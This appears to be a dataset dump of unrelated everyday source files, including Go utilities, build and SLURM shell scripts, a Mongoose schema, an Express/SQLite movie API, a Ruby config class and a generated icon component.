text
stringlengths 1
1.05M
|
|---|
package main
import (
	"fmt"
	"strings"
	"unicode"
)
// ToTitle lower-cases s and then capitalizes the first letter of each word,
// reproducing the behavior of the deprecated strings.Title (which the
// original implementation relied on) without using the deprecated API.
func ToTitle(s string) string {
	prev := ' ' // previous rune; a space so a leading letter starts a word
	return strings.Map(func(r rune) rune {
		if isWordSeparator(prev) {
			prev = r
			return unicode.ToTitle(r)
		}
		prev = r
		return r
	}, strings.ToLower(s))
}

// isWordSeparator reports whether r separates words, mirroring the separator
// rules used internally by the deprecated strings.Title: ASCII letters,
// digits and underscore are not separators; other ASCII is; for non-ASCII,
// only spaces separate.
func isWordSeparator(r rune) bool {
	if r <= 0x7F {
		switch {
		case '0' <= r && r <= '9', 'a' <= r && r <= 'z', 'A' <= r && r <= 'Z', r == '_':
			return false
		}
		return true
	}
	if unicode.IsLetter(r) || unicode.IsDigit(r) {
		return false
	}
	return unicode.IsSpace(r)
}
// main demonstrates ToTitle on a sample sentence.
func main() {
	sample := "this is a title"
	fmt.Println(ToTitle(sample))
}
|
package file
import (
"os"
"strings"
"github.com/hashicorp/go-multierror"
)
// TempDirGenerator creates temporary directories under a single lazily
// created root directory and can recursively clean up everything it (or any
// child generator) created.
type TempDirGenerator struct {
	rootPrefix   string              // prefix used to name the root temp dir
	rootLocation string              // path of the root temp dir; empty until first use
	children     []*TempDirGenerator // child generators cleaned up along with this one
}
// NewTempDirGenerator returns a generator whose temporary directories will
// live under a root directory named with the given prefix.
func NewTempDirGenerator(name string) *TempDirGenerator {
	gen := &TempDirGenerator{}
	gen.rootPrefix = name
	return gen
}
// getOrCreateRootLocation lazily creates the root temp directory (named
// "<rootPrefix>-<random>") on first use and returns its path thereafter.
func (t *TempDirGenerator) getOrCreateRootLocation() (string, error) {
	if t.rootLocation == "" {
		location, err := os.MkdirTemp("", t.rootPrefix+"-")
		if err != nil {
			return "", err
		}
		t.rootLocation = location
	}
	return t.rootLocation, nil
}
// NewGenerator creates a child generator capable of making sibling temp directories.
// The child shares this generator's prefix but lazily creates its own root;
// it is tracked so Cleanup on the parent also cleans the child.
func (t *TempDirGenerator) NewGenerator() *TempDirGenerator {
	gen := NewTempDirGenerator(t.rootPrefix)
	t.children = append(t.children, gen)
	return gen
}
// NewDirectory creates a new temp dir within the generators prefix temp dir.
// The optional name parts are joined with "-" to form the directory's
// prefix; the root dir is created on first call.
func (t *TempDirGenerator) NewDirectory(name ...string) (string, error) {
	location, err := t.getOrCreateRootLocation()
	if err != nil {
		return "", err
	}
	return os.MkdirTemp(location, strings.Join(name, "-")+"-")
}
// Cleanup deletes all temp dirs created by this generator and any child generator.
// Every removal is attempted even if some fail; the returned error aggregates
// all failures (nil when everything succeeded). On success the generator is
// reset so later NewDirectory calls lazily create a fresh root instead of
// trying to populate the deleted one.
func (t *TempDirGenerator) Cleanup() error {
	var allErrs error
	for _, gen := range t.children {
		if err := gen.Cleanup(); err != nil {
			allErrs = multierror.Append(allErrs, err)
		}
	}
	// Drop the child list: their cleanup has been attempted exactly once.
	t.children = nil
	if t.rootLocation != "" {
		if err := os.RemoveAll(t.rootLocation); err != nil {
			allErrs = multierror.Append(allErrs, err)
		} else {
			// Clear the stale path so the generator can be reused.
			t.rootLocation = ""
		}
	}
	return allErrs
}
|
#!/bin/bash
#SBATCH --job-name=QuEST
#SBATCH --time=1:00:0
#SBATCH --nodes=8
#SBATCH --tasks-per-node=8
#SBATCH --cpus-per-task=16
#SBATCH --account=y18
#SBATCH --partition=standard
#SBATCH --export=none
#SBATCH --qos=standard

module load epcc-job-env
module restore PrgEnv-gnu
#module restore /etc/cray-pe.d/PrgEnv-gnu

# One OpenMP thread per allocated CPU, pinned to cores.
export OMP_NUM_THREADS=16
export OMP_PLACES=cores

CMAKE_OPTIONS="-DUSER_SOURCE='compactUnitaryTimer.c' -DQuEST_DIR=QuEST_v2.1.0-gcc10Patch -DDISTRIBUTED=1 -DTESTING=0"

# Rebuild from scratch. -f keeps the very first run (no build dir yet) from
# erroring, and the cd guard stops us from running cmake/make in the wrong
# directory if mkdir failed.
rm -rf build
mkdir build
cd build || exit 1
# CMAKE_OPTIONS is intentionally unquoted so each -D flag is a separate word.
cmake $CMAKE_OPTIONS ../../..
make

NUM_QUBITS=33
NUM_TRIALS=50
EXE=demo
srun --hint=nomultithread --distribution=block:block ./$EXE $NUM_QUBITS $NUM_TRIALS

# Copy timing output back out of the build directory.
cp TIMING* ..
|
var mongoose = require('mongoose');
var Schema = mongoose.Schema;
var uniqueValidator = require('mongoose-unique-validator');

// Schema describing a joinable game lobby.
var Games = new Schema({
    gameType: {
        type: String,
        required: [true, 'Please specify the game you would like to play']
    },
    name: {
        type: String,
        required: [true, 'A name is required'],
        unique: true
    },
    shoes: Number,
    players: Number,
    type: String,
    protected: Boolean,
    // SECURITY(review): stored as plain text — this should be hashed before
    // save; flagged rather than changed here since callers may compare raw.
    password: String,
    pot: Number,
    hasStarted: {
        type: Boolean,
        default: false
    },
    created: {
        type: Date,
        default: Date.now
    },
    modified: {
        type: Date
    }
});

// Stamp the modification time on every save. Assign a Date object to match
// the field's declared Date type (the previous toISOString() string relied
// on mongoose's implicit casting).
Games.pre('save', function(next){
    this.modified = new Date();
    next();
});

// Turn unique-index violations (on `name`) into validation errors.
Games.plugin(uniqueValidator);
module.exports = mongoose.model('Games', Games);
|
import typing as _typing
from .base import BaseModel
MODEL_DICT: _typing.Dict[str, _typing.Type[BaseModel]] = {}
def register_model(name):
    """Return a class decorator registering a BaseModel subclass under ``name``.

    Raises:
        ValueError: if ``name`` is already registered, or if the decorated
            class does not subclass :class:`BaseModel`.
    """
    def register_model_cls(cls):
        # Fixed wording: this registry holds models, not trainers.
        if name in MODEL_DICT:
            raise ValueError("Cannot register duplicate model ({})".format(name))
        if not issubclass(cls, BaseModel):
            raise ValueError(
                "Model ({}: {}) must extend BaseModel".format(name, cls.__name__)
            )
        MODEL_DICT[name] = cls
        return cls
    return register_model_cls
class ModelUniversalRegistry:
    """Lookup facade over the module-level ``MODEL_DICT`` registry."""

    @classmethod
    def get_model(cls, name: str) -> _typing.Type[BaseModel]:
        """Return the model class registered under ``name``.

        Raises:
            TypeError: if ``name`` is not a str.
            KeyError: if no model is registered under ``name``.
        """
        # isinstance is the idiomatic check and also accepts str subclasses.
        if not isinstance(name, str):
            raise TypeError(
                "model name must be a str, got {!r}".format(type(name))
            )
        # Single lookup instead of a membership test followed by .get().
        try:
            return MODEL_DICT[name]
        except KeyError:
            raise KeyError("no model registered under name {!r}".format(name))
|
<reponame>saucelabs/travis-core
class Build
  class Config
    # Normalizes a build config's operating system: when no :os key is
    # present, derives one from the :language key (objective-c => osx,
    # everything else => linux).
    class OS
      OS_LANGUAGE_MAP = {
        "objective-c" => "osx",
      }
      DEFAULT_OS = "linux"

      attr_reader :config, :options

      def initialize(config, options)
        @config = config
        @options = options
      end

      # Returns config untouched when an OS is already given, otherwise a
      # copy with the language-derived :os merged in.
      def run
        os_given? ? config : config.merge(os: os_for_language)
      end

      private

      # True when the config carries an :os key as symbol or string.
      def os_given?
        config.key?(:os) || config.key?('os')
      end

      # Matrix include entries. NOTE(review): not referenced within this
      # class — confirm external callers before removing.
      def includes
        config.fetch(:matrix, {}).fetch(:include, [])
      end

      # OS implied by the configured language, falling back to DEFAULT_OS.
      def os_for_language
        OS_LANGUAGE_MAP.fetch(config[:language], DEFAULT_OS)
      end
    end
  end
end
|
#!/bin/sh
set -e
# Test running just latexrun empty.tex, where empty.tex produces no output.
TMP=tmp.$(basename -s .sh "$0")
mkdir -p "$TMP"
cat > "$TMP/empty.tex" <<EOF
\documentclass{article}
\begin{document}
\end{document}
EOF
clean() {
rm -rf "$TMP"
}
# Clean up on normal exit as well as interrupt/termination: with set -e, a
# failure of the command under test would otherwise leave the temp dir behind.
trap clean EXIT INT TERM
# Intentionally use just the latexrun command to test when -o is not provided.
"$1" "$TMP/empty.tex"
## output:
## No pages of output; output not updated
|
def retire_amendment(amendment_id: int) -> bool:
    """Cancel the given amendment when it is valid and eligible.

    Returns True when the amendment was cancelled, False when the id is
    invalid/unknown or the retirement conditions are not met.
    """
    # Product-level retirement settings drive the eligibility check below.
    settings = get_retirement_settings()

    # Guard clauses: bail out early on an unknown id or ineligible amendment.
    if not is_valid_amendment(amendment_id):
        return False
    if not meets_cancellation_conditions(amendment_id, settings):
        return False

    # Eligible: perform the cancellation and report success.
    cancel_amendment(amendment_id)
    return True
|
#!/bin/bash
# One-shot data import, then idle forever so the container stays up instead
# of exiting (and being restarted) after the import completes.
python3 import_data.py
# keep running after single import
while true; do sleep 30; done
# Still needs work
#python3 app.py
|
#!/bin/bash
# Build the Autoware Docker images from the repository root.
# Stop on the first failure: the pre-built image presumably layers on
# autoware:base (confirm against the Dockerfiles), so continuing after a
# failed base build would use a stale or missing base image.
set -e
SCRIPT_DIR=$(readlink -f "$(dirname "$0")")
AUTOWARE_PROJ_ROOT="$SCRIPT_DIR/../"
DOCKER_BUILDKIT=1 docker build -t autoware:base --ssh default -f "$SCRIPT_DIR/base/Dockerfile" "$AUTOWARE_PROJ_ROOT"
DOCKER_BUILDKIT=1 docker build -t autoware:pre-built --ssh default -f "$SCRIPT_DIR/pre-built/Dockerfile" "$AUTOWARE_PROJ_ROOT"
|
#!/usr/bin/env bash
# shell.sh
# This script starts a shell in an already built container. Sometimes you need to poke around using the shell
# to diagnose problems.
# stop any existing running container
./stop.sh
# fire up the container with a shell (/bin/sh)
docker run -it --rm --name chapter02 chapter02 /bin/sh
|
echo Starting...
# Guard the cd: serving from the wrong directory would silently use the
# wrong (or no) site source.
cd src || exit 1
bundle exec jekyll serve --future --limit_posts 1
cd ..
|
<reponame>sdsmnc221/visia-panorama-b<gh_stars>0
import { CUModal } from './cumodal';
import { formatBytes, CSVtoJSON, checkCSV, apiCSV } from '../services/helper';
// CUForm: jQuery/Semantic-UI controller for a create/update form with
// repeatable field rows, CSV upload with preview, a validation-gated submit
// button, and an AJAX submit flow that reports success through a CUModal.
// NOTE(review): relies on page-level globals — $ (jQuery + Semantic-UI
// plugins), _ (lodash) and a `form` descriptor object (form.type, form.what,
// form.fields_data) — none of which are imported here; confirm they are
// provided by the enclosing page.
class CUForm {
    // el: selector or element of the form to control.
    constructor(el) {
        this.form = $(el);
        this.init();
    }
    // Caches the content container, then wires buttons, validation and modal.
    init() {
        this.form.content = this.form.find('.form__content').first();
        this.initFormBtns();
        this.initFormController();
        this.initModal();
    }
    // Wires every toolbar button; handles are stored on this.form.btns.
    initFormBtns() {
        this.form.btns = {}; //Array.from(this.form.find('.form__btns button'));
        this.initAddBtn();
        this.initResetBtn();
        this.initSubmitBtn();
        this.initUploadBtn();
        this.initOtherFields();
    }
    // Activates Semantic-UI dropdown behavior on all dropdown fields.
    initDropdownFields() {
        Array.from(this.form.find('.ui.dropdown').dropdown());
    }
    // "Add" button: appends a fresh copy of the first (pristine) field row.
    initAddBtn() {
        // Snapshot the first row's markup before the user edits anything.
        const fieldsTemplate = this.form.find('.fields').first().wrap('').parent().html();
        this.form.btns.add = this.form.find('.add').first();
        this.form.btns.add.on('mouseover', e => {
            $(e.target).removeClass('disabled').addClass('primary');
        });
        this.form.btns.add.on('mouseout', e => {
            $(e.target).removeClass('primary');
        });
        this.form.btns.add.on('click', e => {
            e.preventDefault();
            this.form.content.append(fieldsTemplate);
            // Re-run validation wiring so the new inputs are tracked.
            this.initFormController();
        });
    }
    // "Reset" button: restores the content area to its initial markup.
    initResetBtn() {
        // Snapshot of the whole content area at construction time.
        const fieldsTemplate = this.form.content.html();
        this.form.btns.reset = this.form.find('.reset').first();
        this.form.btns.reset.on('mouseover', e => {
            $(e.target).removeClass('disabled').addClass('primary');
        });
        this.form.btns.reset.on('mouseout', e => {
            $(e.target).removeClass('primary');
        });
        this.form.btns.reset.on('click', e => {
            e.preventDefault();
            this.form.content.html(fieldsTemplate);
            this.initFormController();
        });
    }
    // Submit button: two variants keyed on whether the page URL mentions
    // "datasets" — the non-dataset variant also shows a fill-all-fields popup.
    initSubmitBtn() {
        this.form.btns.submit = this.form.find('.submit').first();
        if (!window.location.href.includes('datasets')) {
            this.form.btns.submit.popup({
                position: 'bottom left',
                target: '.form__content',
                context: '.form__content',
                content: 'N\'oubliez pas de remplir tous les champs !',
            });
            this.form.btns.submit.on('click', e => {
                e.preventDefault();
                let btn = $(e.target);
                // Only submit when the button is not disabled by validation.
                $.when(btn.hasClass('disabled'))
                    .done(isBtnDisabled => {
                        if (!isBtnDisabled) this.callAjax(true);
                    });
                // if (!btn.hasClass('disabled')) {
                // this.callAjax();
                // }
            });
        } else {
            this.form.btns.submit.on('click', e => {
                e.preventDefault();
                let btn = $(e.target);
                $.when(btn.hasClass('disabled'))
                    .done(isBtnDisabled => {
                        if (!isBtnDisabled) this.callAjax();
                    });
            });
        }
    }
    // Upload button: wires the hidden file input, description area, output
    // preview and toolbar; on file selection, validates the CSV and sends it
    // to the API for preview rendering.
    initUploadBtn() {
        this.form.btns.upload = this.form.find('.upload').first();
        this.form.btns.upload.desc = this.form.find('.form__file__desc').first();
        this.form.btns.upload.desc.default = this.form.btns.upload.desc.html();
        this.form.btns.upload.input = this.form.find('#form__file').first();
        this.form.btns.upload.output = this.form.find('.form__file__data').first();
        this.form.btns.upload.output.def = this.form.btns.upload.output.html();
        this.form.btns.upload.toolbar = this.form.find('.form__file__toolbar').first();
        this.form.btns.upload.toolbar.def = this.form.btns.upload.toolbar.html();
        this.form.btns.upload.on('mouseover', e => {
            $(e.target).addClass('primary');
        });
        this.form.btns.upload.on('mouseout', e => {
            $(e.target).removeClass('primary');
        });
        // Opening the picker resets preview and toolbar to their defaults.
        this.form.btns.upload.input.on('click', e => {
            this.form.btns.upload.toolbar.removeClass('loading hide').html(this.form.btns.upload.toolbar.def);
            this.form.btns.upload.output.removeClass('loading').html(this.form.btns.upload.output.def);
        })
        this.form.btns.upload.input.on('change', e => {
            let file = e.target.files[0],
                fileReader = new FileReader();
            // Multi-line template literal: the embedded newline is intentional.
            file.desc = `<p>${file.name}</p>
<p>${formatBytes(file.size, 3)}</p>`;
            fileReader.onload = () => {
                let data = fileReader.result;
                if (checkCSV(data)) {
                    this.form.btns.upload.output.find('.segment').addClass('loading');
                    this.form.btns.upload.toolbar.find('.segment').addClass('loading');
                    console.log(data);
                    apiCSV(data, this.form.btns.upload.output, this.form.btns.upload.toolbar);
                }
            };
            fileReader.readAsText(file);
            this.form.btns.upload.desc.html(file.desc);
        });
    }
    // Placeholder for additional field wiring.
    initOtherFields() {
        //
    }
    // Enables the submit button only while no tracked input is blank.
    initFormController() {
        //Quick workaround for create dataset form, will return to this later
        if (!window.location.href.includes('datasets')) {
            // NOTE(review): `form` here is the page-level global, not this.form.
            if (form.type === 'create') $(this.form.btns.submit).addClass('disabled');
            this.form.content.fields = Array.from(this.form.find('.fields'));
            this.form.content.inputs = Array.from(this.form.content.find('input'));
            this.form.content.inputs.forEach(input=> {
                $(input).on('keyup', e => {
                    let input = $(e.target),
                        hasBlankField = this.form.content.inputs.some(i => $(i).val().trim() === '');
                    if (hasBlankField) {
                        $(this.form.btns.submit).addClass('disabled');
                    } else {
                        $(this.form.btns.submit).removeClass('disabled');
                    }
                });
            });
        }
        this.initDropdownFields();
    }
    // Binds the success modal that follows this form in the DOM.
    initModal() {
        this.form.modal = new CUModal(this.form.next('.modal.onSuccess'));
    }
    // Submits the collected data. The non-dataset path POSTs with a CSRF
    // header and opens the success modal; the dataset path only logs (WIP).
    callAjax(isDataset = false) {
        if (!isDataset) {
            console.log('l');
            let url = `/${form.what}`;
            form.data = this.collectData();
            $.ajaxSetup({
                headers: {
                    'X-CSRF-TOKEN': $('meta[name="_token"]').attr('content')
                }
            });
            $.ajax({
                url: url,
                type: 'POST',
                dataType: 'json',
                // NOTE(review): posts the whole global `form` object, not
                // just form.data — confirm the server expects this shape.
                data: form,
                success: data => {
                    console.log(data);
                    this.form.modal.launchModal(data);
                },
                error: error => {
                    console.log(error);
                }
            });
        } else {
            let url = `/${form.what}`;
            form.data = this.collectData(true);
            console.log(url);
            console.log(form.data);
        }
    }
    // Zips the global form.fields_data keys against each row's input values;
    // the dataset branch is a stub returning a placeholder.
    collectData(isDataset = false) {
        if (!isDataset) {
            return _.flattenDeep(this.form.content.fields.map(field => {
                return _.zipObject(form.fields_data, Array.from($(field).find('input'))
                    .map(input => $(input).val().trim()));
            }))
        } else {
            return 'toto';
        }
    }
}
export { CUForm };
|
#!/usr/bin/env bash
# Bump the package patch version (npm creates the commit and tag), then push
# the commit; && stops the push if the bump fails.
# NOTE(review): the tag created by `npm version` is not pushed by a plain
# `git push` — add --follow-tags if tags should reach the remote.
npm version patch && \
git push
|
# File to be sourced to setup the ALEPH env
# Main ALEPH software directory
export ALEPH=/cvmfs/aleph.cern.ch/i386_redhat42
# ALEPH Banks and database (paths derived from $ALEPH above)
export BANKALFMT=$ALEPH/dbase/bankal.fmt
export DBASBANK=$ALEPH/dbase/dbas.bank
export ADBSCONS=$ALEPH/dbase/adbscons.daf
# Job cards
export ALPHACARDS=MIT.cards
# Not needed: required perhaps by ALPHARUN
# export STAGE_HOST=local
|
#!/bin/bash
set -euo pipefail
# Install the elasticsearch-operator, unless a deployment already exists.
if oc -n "openshift-operators-redhat" get deployment elasticsearch-operator -o name > /dev/null 2>&1 ; then
    # Already deployed; nothing to do.
    exit 0
fi
# Build and deploy the operator catalog from the sibling checkout, then
# install the operator from it. The two registry variables point at the
# local build registry and the in-cluster registry respectively.
pushd ../elasticsearch-operator
LOCAL_IMAGE_ELASTICSEARCH_OPERATOR_REGISTRY=127.0.0.1:5000/openshift/elasticsearch-operator-registry \
make elasticsearch-catalog-deploy
IMAGE_ELASTICSEARCH_OPERATOR_REGISTRY=image-registry.openshift-image-registry.svc:5000/openshift/elasticsearch-operator-registry \
make -C ../elasticsearch-operator elasticsearch-operator-install
popd
|
#!/usr/bin/env sh
# Smoke-test that all required build tooling is installed by printing each
# tool's version; set -e/-u abort on the first missing tool.
set -e
set -u
make --version
zip --version
git --version
curl --version
# `openssl version` prints the version like every other check here (the
# previous `which openssl` only printed a path).
openssl version
docker --version
docker-compose --version
bash --version
envsubst --version
|
package cntr
// DistinctStrings returns the unique values in elems, preserving first-seen
// order (the previous implementation iterated a map and therefore returned
// a randomized order). Returns nil when elems is empty.
func DistinctStrings(elems ...string) []string {
	seen := make(map[string]struct{}, len(elems))
	var out []string
	for _, e := range elems {
		if _, ok := seen[e]; ok {
			continue
		}
		seen[e] = struct{}{}
		out = append(out, e)
	}
	return out
}
|
<filename>src/shared/models/response.model.ts
/**
 * Standard API response envelope: an error flag, a human-readable message
 * and a results payload (defaulting to an empty object when absent).
 */
export default class ResponseModel {
    error: boolean;
    message: string;
    results: any;

    constructor(error: boolean, message: string, results: any) {
        this.error = error;
        this.message = message;
        // ?? only substitutes for null/undefined; the previous `|| {}` also
        // discarded legitimate falsy results such as 0, '' and false.
        this.results = results ?? {};
    }

    /** Builds a success response carrying the given results. */
    static success(results: any) {
        return new ResponseModel(false, '', results);
    }

    /** Builds an error response with the given message and empty results. */
    static error(message: string) {
        return new ResponseModel(true, message, null);
    }
}
|
#!/bin/bash
# CI build-and-test driver for Weld: installs the Python bindings into a
# virtualenv, builds the Rust crate against the requested LLVM, then runs
# tests and benchmarks.
# Args: $1 = LLVM version, $2 = llvm-sys crate version, $3 = Python version.
LLVM_VERSION=$1
LLVM_SYS_VERSION=$2
PYTHON_VERSION=$3
VENV_HOME=`pwd`/.virtualenv
# create llvm-config symlink
sudo rm -f /usr/bin/llvm-config
sudo ln -s /usr/bin/llvm-config-$LLVM_VERSION /usr/bin/llvm-config
export WELD_HOME=`pwd`
source $VENV_HOME/python$PYTHON_VERSION/bin/activate
# Install the Python packages (pyweld then grizzly) into the virtualenv.
cd python/pyweld
python setup.py install
cd ../..
cd python/grizzly
python setup.py install
cd ../..
# set llvm-sys crate version
sed -i "s/llvm-sys = \".*\"/llvm-sys = \"$LLVM_SYS_VERSION\"/g" Cargo.toml
# build and test
# Note that cargo build must, counterintuitively, come after setup.py install,
# because numpy_weld_convertor.cpp is built by cargo.
make -C weld_rt/cpp/
cargo build --release
cargo test
# The Python tests load the freshly built shared library from target/release.
export LD_LIBRARY_PATH=`pwd`/target/release
python python/grizzly/tests/grizzly_test.py
python python/grizzly/tests/numpy_weld_test.py
# run tests for nditer - first need to install weldnumpy
cd python/numpy
python setup.py install
python ../../examples/python/nditer/nditer_test.py
cd ../..
# Run the benchmark suite and stash its outputs under $WELD_HOME/results.
cd $WELD_HOME/weld-benchmarks; python run_benchmarks.py -b tpch_q1 tpch_q6 vector_sum map_reduce data_cleaning crime_index crime_index_simplified -n 5 -f results.tsv -v -d -p performance.png
mkdir -p $WELD_HOME/results
mv performance.png $WELD_HOME/results
mv results.tsv $WELD_HOME/results
cd $WELD_HOME
deactivate
|
const express = require('express');
const router = express.Router();
let sqlite3 = require('sqlite3').verbose();

// Open the movies database read-only; the routes below assume it is usable.
let db = new sqlite3.Database('./db/movies.db', sqlite3.OPEN_READONLY, (err) => {
    if (err) {
        return console.error(err.message);
    }
    console.log('Connected to the movies database.');
});

// GET / — list up to 50 movies.
router.get('/', (req, res) => {
    // Leading whitespace inside the template literal is part of the SQL and
    // harmless; the continuation lines are kept unindented deliberately.
    const sql = `SELECT title,
imdbId, genres,
releaseDate, budget
FROM movies LIMIT 50`;
    db.all(sql, (err, movies) => {
        if (err) {
            // Answer the request instead of leaving it hanging forever.
            console.error(err.message);
            return res.status(500).send('An error occurred while querying the database.');
        }
        // db.all yields an array; an empty one means no titles were found
        // (the previous truthiness check made the "not found" branch unreachable).
        if (movies && movies.length) {
            res.send(movies);
        } else {
            res.send('No movie titles have been found.');
        }
    });
});

// GET /:movieId — fetch one movie's id, title and overview.
router.get('/:movieId', (req, res) => {
    const sql = `SELECT movieId id,
title title,
overview overview
FROM movies
WHERE movieId = ?`;
    const movieId = req.params.movieId;
    db.get(sql, [movieId], (err, row) => {
        if (err) {
            console.error(err.message);
            return res.status(500).send('An error occurred while querying the database.');
        }
        if (row) {
            console.log(row.id, row.title)
            res.status(200).json({'id': row.id, 'title': row.title, 'overview': row.overview});
        } else {
            console.log(`No movie found with the id ${movieId}`);
            res.send(`No movie found with the id ${movieId}`);
        }
    });
});

module.exports = router;
|
using System;

/// <summary>Reads n from stdin and prints the sum of odd numbers 1..n.</summary>
public class SumOddNumbers
{
    public static void Main()
    {
        // Console lives in System; without the using directive above this
        // file did not compile standalone.
        int n = int.Parse(Console.ReadLine());
        int sum = 0;
        // Accumulate 1 + 3 + 5 + ... up to and including n (when n is odd).
        for (int i = 1; i <= n; i += 2)
        {
            sum += i;
        }
        Console.WriteLine(sum);
    }
}
|
/* GENERATED FILE */
import { html, svg, define } from "hybrids";
// Hybrids component definition for the Phosphor "club" icon.
// NOTE: generated file — regenerate rather than hand-editing the SVG paths.
const PhClub = {
    color: "currentColor", // stroke/fill color; inherits the text color by default
    size: "1em",           // rendered width and height
    weight: "regular",     // which path variant the template below selects
    mirrored: false,       // when true, the SVG is flipped horizontally
    // Renders a single <svg>; exactly one ${...} branch below matches the
    // current weight. The template-literal lines are kept byte-identical.
    render: ({ color, size, weight, mirrored }) => html`
<svg
xmlns="http://www.w3.org/2000/svg"
width="${size}"
height="${size}"
fill="${color}"
viewBox="0 0 256 256"
transform=${mirrored ? "scale(-1, 1)" : null}
>
${weight === "bold" &&
svg`<path d="M104.512,186.61814a47.9857,47.9857,0,1,1-17.29771-85.30105l-.00069.00287a48,48,0,1,1,81.57046.00366l-.00718-.00443a48.00516,48.00516,0,1,1-17.28893,85.299L160,232H96Z" fill="none" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" stroke-width="24"/>`}
${weight === "duotone" &&
svg`<g opacity="0.2">
<path d="M112.51708,179.15431a47.97767,47.97767,0,1,1-25.30276-77.83722l-.00069.00287a48,48,0,1,1,81.57046.00366l-.00718-.00443a48.00575,48.00575,0,1,1-25.29289,77.8364L160,232H96Z"/>
</g>
<path d="M112.51708,179.15431a47.97767,47.97767,0,1,1-25.30276-77.83722l-.00069.00287a48,48,0,1,1,81.57046.00366l-.00718-.00443a48.00575,48.00575,0,1,1-25.29289,77.8364L160,232H96Z" fill="none" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" stroke-width="16"/>`}
${weight === "fill" &&
svg`<path d="M232,148a52.00505,52.00505,0,0,1-80.459,43.52539l10.6538,34.08789A7.99984,7.99984,0,0,1,154.55908,236H101.44092a7.99954,7.99954,0,0,1-7.63526-10.38672L104.45459,191.542a51.7046,51.7046,0,0,1-29.9624,8.43653c-27.72657-.78516-50.377-24.00489-50.4917-51.75977A51.99976,51.99976,0,0,1,76,96q2.02881,0,4.04883.15625a52.00294,52.00294,0,1,1,95.89648,0,53.33621,53.33621,0,0,1,5.46387-.1377A51.70261,51.70261,0,0,1,232,148Z"/>`}
${weight === "light" &&
svg`<path d="M112.51708,179.15431a47.97767,47.97767,0,1,1-25.30276-77.83722l-.00069.00287a48,48,0,1,1,81.57046.00366l-.00718-.00443a48.00575,48.00575,0,1,1-25.29289,77.8364L160,232H96Z" fill="none" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" stroke-width="12"/>`}
${weight === "thin" &&
svg`<path d="M112.51708,179.15431a47.97767,47.97767,0,1,1-25.30276-77.83722l-.00069.00287a48,48,0,1,1,81.57046.00366l-.00718-.00443a48.00575,48.00575,0,1,1-25.29289,77.8364L160,232H96Z" fill="none" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" stroke-width="8"/>`}
${weight === "regular" &&
svg`<path d="M112.51708,179.15431a47.97767,47.97767,0,1,1-25.30276-77.83722l-.00069.00287a48,48,0,1,1,81.57046.00366l-.00718-.00443a48.00575,48.00575,0,1,1-25.29289,77.8364L160,232H96Z" fill="none" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" stroke-width="16"/>`}
</svg>
`,
};
// Register the component as the <ph-club> custom element.
define("ph-club", PhClub);
export default PhClub;
|
import java.util.Arrays;
public class ArrayInfo {
    /** Prints the minimum, maximum and mean of a fixed sample array. */
    public static void main(String[] args) {
        int[] values = {3, 1, 5, 9, 4};
        // One pass over the stream gathers min, max and average together.
        java.util.IntSummaryStatistics stats = Arrays.stream(values).summaryStatistics();
        System.out.println("Min: " + stats.getMin());
        System.out.println("Max: " + stats.getMax());
        System.out.println("Mean: " + stats.getAverage());
    }
}
|
package com.banana.volunteer.VO.reportVO;
import com.fasterxml.jackson.annotation.JsonInclude;
import com.fasterxml.jackson.annotation.JsonProperty;
import lombok.Data;
import java.util.List;
/**
 * View object carried in the report-list API response; null fields are
 * omitted from the serialized JSON.
 */
@Data
@JsonInclude(JsonInclude.Include.NON_NULL)
public class ReportDataVO {
    /** Total number of reports (serialized as "total"). */
    @JsonProperty("total")
    private Integer reportTotal;

    /** Page of report rows (serialized as "report_list"). */
    @JsonProperty("report_list")
    private List<ReportViewListVO> reportViewListVO;
}
|
package fr.unice.polytech.si3.qgl.soyouz.tooling.awt;
import fr.unice.polytech.si3.qgl.soyouz.Cockpit;
import fr.unice.polytech.si3.qgl.soyouz.classes.geometry.Position;
import fr.unice.polytech.si3.qgl.soyouz.classes.marineland.entities.ShapedEntity;
import fr.unice.polytech.si3.qgl.soyouz.tooling.model.SimulatorModel;
import java.util.Collection;
import java.util.LinkedList;
import java.util.List;
/**
 * View abstraction for the ship simulator UI: rendering toggles, reset and
 * update hooks, plus helpers shared by all view implementations.
 */
public interface SimulatorView
{
    /**
     * Appends each ship's current position to its per-ship history list,
     * skipping consecutive duplicates so nothing accumulates while a ship
     * is stationary.
     */
    static void updateHistory(SimulatorModel model, LinkedList<Position>[] shipHistory)
    {
        var ships = model.getShips();
        for (int i = 0; i < ships.length; i++)
        {
            var history = shipHistory[i];
            var shipPos = ships[i].getPosition();
            if (history.isEmpty() || !shipPos.equals(history.getLast()))
            {
                history.add(shipPos);
            }
        }
    }

    /** Discards all recorded ship position history. */
    void clearHistory();

    /** Toggles drawing of the computed path. */
    void setDrawPath(boolean selected);

    /** Toggles drawing of path nodes. */
    void setDrawNodes(boolean selected);

    /** Toggles collision-debug rendering. */
    void setDebugCollisions(boolean selected);

    /** Enables or disables keeping the view centered. */
    void centerView(boolean b);

    /** Resets the view to its initial state. */
    void reset();

    /** Redraws the view from the current model state. */
    void update();

    /** The simulation model backing this view. */
    SimulatorModel getModel();

    /**
     * Shapes to draw: the first cockpit's remembered entities when it is a
     * Cockpit instance, otherwise whatever the first NPS currently sees.
     */
    default Collection<ShapedEntity> getVisibleShapes()
    {
        var cp = getModel().cockpits[0];
        if (cp instanceof Cockpit)
            return ((Cockpit)cp).entityMemory.values();
        return List.of(getModel().nps[0].getVisibleEntities());
    }
}
|
# Specs for Complex-aware Math#asinh / Math.asinh, driven by the shared
# examples in shared/asinh.
require File.expand_path('../../../../spec_helper', __FILE__)
require 'complex'
require File.expand_path('../shared/asinh', __FILE__)

# Instance-method form, exercised through a class that includes Math; it
# must also remain private on the including class.
describe "Math#asinh" do
  it_behaves_like :complex_math_asinh, :_, IncludesMath.new
  it "is a private instance method" do
    IncludesMath.should have_private_instance_method(:asinh)
  end
end

# Module-function form on CMath shares the same examples.
describe "Math.asinh" do
  it_behaves_like :complex_math_asinh, :_, CMath
end
|
import React from 'react';
import clsx from 'clsx';
import { makeStyles } from '@material-ui/styles';
import CssBaseline from '@material-ui/core/CssBaseline';
import Drawer from '@material-ui/core/Drawer';
import Box from '@material-ui/core/Box';
import AppBar from '@material-ui/core/AppBar';
import Toolbar from '@material-ui/core/Toolbar';
import List from '@material-ui/core/List';
import Typography from '@material-ui/core/Typography';
